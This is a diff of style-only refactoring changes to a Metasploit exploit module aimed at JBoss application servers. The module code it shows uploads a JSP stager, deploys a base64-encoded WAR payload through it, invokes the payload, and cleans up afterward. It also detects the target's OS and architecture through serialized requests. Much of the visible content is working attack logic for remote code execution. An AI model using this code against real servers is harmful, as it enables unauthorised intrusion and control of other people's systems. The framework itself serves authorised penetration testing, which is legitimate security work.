@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  HttpFingerprint = { :pattern => [ /JBoss/ ] }
+  HttpFingerprint = { pattern: [ /JBoss/ ] }
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
@@ -36,7 +36,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2007-02-20',
         'Privileged' => true,
-        'Platform' => %w{java linux win},
         'Stance' => Msf::Exploit::Stance::Aggressive,
         'Targets' => [
 
@@ -52,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Java Universal',
             {
-              'Arch' => ARCH_JAVA,
+              'Arch' => ARCH_JAVA
             },
           ],
 
@@ -101,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_error('Connection timed out')
       return Exploit::CheckCode::Unknown
     elsif res.code != 200
-      vprint_error("Unable to request version, returned http code is: #{res.code.to_s}")
+      vprint_error("Unable to request version, returned http code is: #{res.code}")
       return Exploit::CheckCode::Unknown
     end
 
@@ -148,21 +147,21 @@ class MetasploitModule < Msf::Exploit::Remote
     call_uri_mtimes(stager_uri, 5, 'GET')
 
     # Generate the WAR with the payload which will be uploaded through the stager
-    app_base = datastore['APPBASE'] || rand_text_alpha(8 + rand(8))
-    jsp_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))
+    app_base = datastore['APPBASE'] || rand_text_alpha(rand(8..15))
+    jsp_name = datastore['JSP'] || rand_text_alpha(rand(8..15))
 
     war_data = payload.encoded_war({
-      :app_name => app_base,
-      :jsp_name => jsp_name,
-      :arch => mytarget.arch,
-      :platform => mytarget.platform
+      app_name: app_base,
+      jsp_name: jsp_name,
+      arch: mytarget.arch,
+      platform: mytarget.platform
     }).to_s
 
     b64_war = Rex::Text.encode_base64(war_data)
-    print_status("Uploading payload through stager")
-    res = send_request_cgi({
+    print_status('Uploading payload through stager')
+    send_request_cgi({
       'uri' => stager_uri,
-      'method' => "POST",
+      'method' => 'POST',
       'vars_post' =>
       {
         name_parameter => app_base,
@@ -171,13 +170,13 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     payload_uri = "/#{app_base}/#{jsp_name}.jsp"
-    print_status("Calling payload: " + payload_uri)
-    res = call_uri_mtimes(payload_uri, 5, 'GET')
+    print_status('Calling payload: ' + payload_uri)
+    call_uri_mtimes(payload_uri, 5, 'GET')
 
     # Remove the payload through  stager
     print_status('Removing payload through stager')
     delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"
-    res = send_request_cgi({ 'uri' => delete_payload_uri })
+    send_request_cgi({ 'uri' => delete_payload_uri })
 
     # Remove the stager
     print_status('Removing stager')
@@ -188,16 +187,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_stager(name_param, content_param)
-    war_file = rand_text_alpha(4 + rand(4))
-    file_content = rand_text_alpha(4 + rand(4))
-    jboss_home = rand_text_alpha(4 + rand(4))
-    decoded_content = rand_text_alpha(4 + rand(4))
-    path = rand_text_alpha(4 + rand(4))
-    fos = rand_text_alpha(4 + rand(4))
-    name = rand_text_alpha(4 + rand(4))
-    file = rand_text_alpha(4 + rand(4))
+    war_file = rand_text_alpha(rand(4..7))
+    file_content = rand_text_alpha(rand(4..7))
+    jboss_home = rand_text_alpha(rand(4..7))
+    decoded_content = rand_text_alpha(rand(4..7))
+    path = rand_text_alpha(rand(4..7))
+    fos = rand_text_alpha(rand(4..7))
+    name = rand_text_alpha(rand(4..7))
+    file = rand_text_alpha(rand(4..7))
 
-    stager_script = <<~EOT
+    <<~EOT
       <%@page import="java.io.*,
           java.util.*,
           sun.misc.BASE64Decoder"
@@ -285,7 +284,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # JBoss might need some time for the deployment. Try 5 times at most and
     # wait 5 seconds inbetween tries
     num_attempts.times do |attempt|
-      if verb == "POST"
+      if verb == 'POST'
         res = send_request_cgi(
           {
             'uri' => uri,
@@ -345,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_serialized_request('osname')
 
     if res.body =~ /(Linux|FreeBSD|Windows)/i
-      os = $1
+      os = ::Regexp.last_match(1)
       if os =~ /Linux/i
         return 'linux'
       elsif os =~ /FreeBSD/i
@@ -362,7 +361,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Attempting to automatically detect the architecture')
     res = send_serialized_request('osarch')
     if res.body =~ /(i386|x86)/i
-      arch = $1
+      arch = ::Regexp.last_match(1)
       if arch =~ /i386|x86/i
         return ARCH_X86
         # TODO, more
